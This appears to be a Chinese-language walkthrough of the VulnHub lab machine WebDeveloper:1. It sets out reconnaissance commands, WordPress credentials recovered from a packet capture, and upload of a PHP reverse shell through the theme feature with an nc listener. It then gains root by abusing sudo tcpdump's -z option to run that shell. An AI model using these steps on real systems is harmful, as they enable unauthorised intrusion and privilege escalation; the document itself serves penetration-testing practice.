WebDeveloper:1靶机渗透测试

一、靶机下载地址

https://www.vulnhub.com/entry/web-developer-1,288/

二、信息收集

1、主机发现

复制代码
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:54:22:E9"

2、端口扫描

复制代码
# 使用命令
nmap 192.168.145.216 -p- -sV

3、指纹识别

复制代码
# 使用命令
whatweb "http://192.168.145.216"

4、目录扫描

复制代码
# 使用命令
dirsearch -u "http://192.168.145.216"

三、获取shell

1、访问靶机IP地址

2、拼接并访问ipdata目录,发现一个流量包,下载使用wireshark打开

3、查看后发现wordpress后台用户密码:webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

4、拼接并访问/wp-admin,发现登录框界面

5、用找到的用户名密码登录wordpress,登录成功

6、利用wordpress的上传theme功能getshell,在下处发现一处文件上传页面

7、把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下ip和port,保存,并上传。

复制代码
# 使用命令
mv php-reverse-shell.php /home/kali/Desktop
vim php-reverse-shell.php

8、上传php-reverse-shell.php文件

9、经过尝试发现上传的反弹shell在wp-content/uploads/ 目录的子目录下

10、kali开启监听

复制代码
# 使用命令
nc -lvnp 1234

11、访问上传的文件,成功反弹到shell

12、输入以下命令,获得交互式shell

复制代码
# 使用命令
python3 -c 'import pty; pty.spawn("/bin/bash")'

四、提权

1、进入到/var/www/html/wp-config.php,找到数据库wordpress的用户名和密码webdeveloper : MasterOfTheUniverse

2、使用ssh进行连接

复制代码
# 使用命令
ssh webdeveloper@192.168.145.216

3、输入如下命令查找php-reverse-shell.php的位置,找到其位置在/var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php

复制代码
# 使用命令
find / -name php-reverse-shell.php 2>/dev/null

4、然后输入以下命令,并且kali开启监听

复制代码
# 使用命令
COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

# 监听
nc -lvnp 1234

5、成功反弹到shell,提权成功

相关推荐
不灭锦鲤2 小时前
网络安全第120天
安全·web安全
超级无敌zhq3 小时前
后渗透痕迹清理:攻防对抗中的隐身术
网络·数据库·网络安全
打码人的日常分享3 小时前
数据安全,网络安全风险评估报告(Word)
安全·web安全
TechWayfarer4 小时前
IP画像在企业安全中的应用:它能做什么?不能替代什么
网络·python·tcp/ip·安全·网络安全
杭州默安科技5 小时前
AI挖掘0day漏洞常态化,企业网络防御该如何破局?
人工智能·网络安全
Inhand陈工6 小时前
映翰通IG502实战:通过RS232采集交通信号灯数据,实现自动短信告警
网络·嵌入式硬件·物联网·网络安全·边缘计算·信息与通信·信号处理
淼淼爱喝水6 小时前
DVWA跨站请求伪造漏洞检测实验
网络安全·dvwa
行者-全栈开发6 小时前
【智慧防洪】水利物联网监测网络设计:从传感器选型到边缘计算的完整实践
物联网·网络安全·lora·边缘计算·nb-iot·mqtt 协议·传感器选型
X7x58 小时前
可信计算架构:数字时代的安全基石
网络安全·网络攻击模型·安全威胁分析·安全架构·可信计算架构
青藤云安全9 小时前
主机安全体系化建设与合规实战指南
网络安全·企业安全·云安全·主机安全·终端安全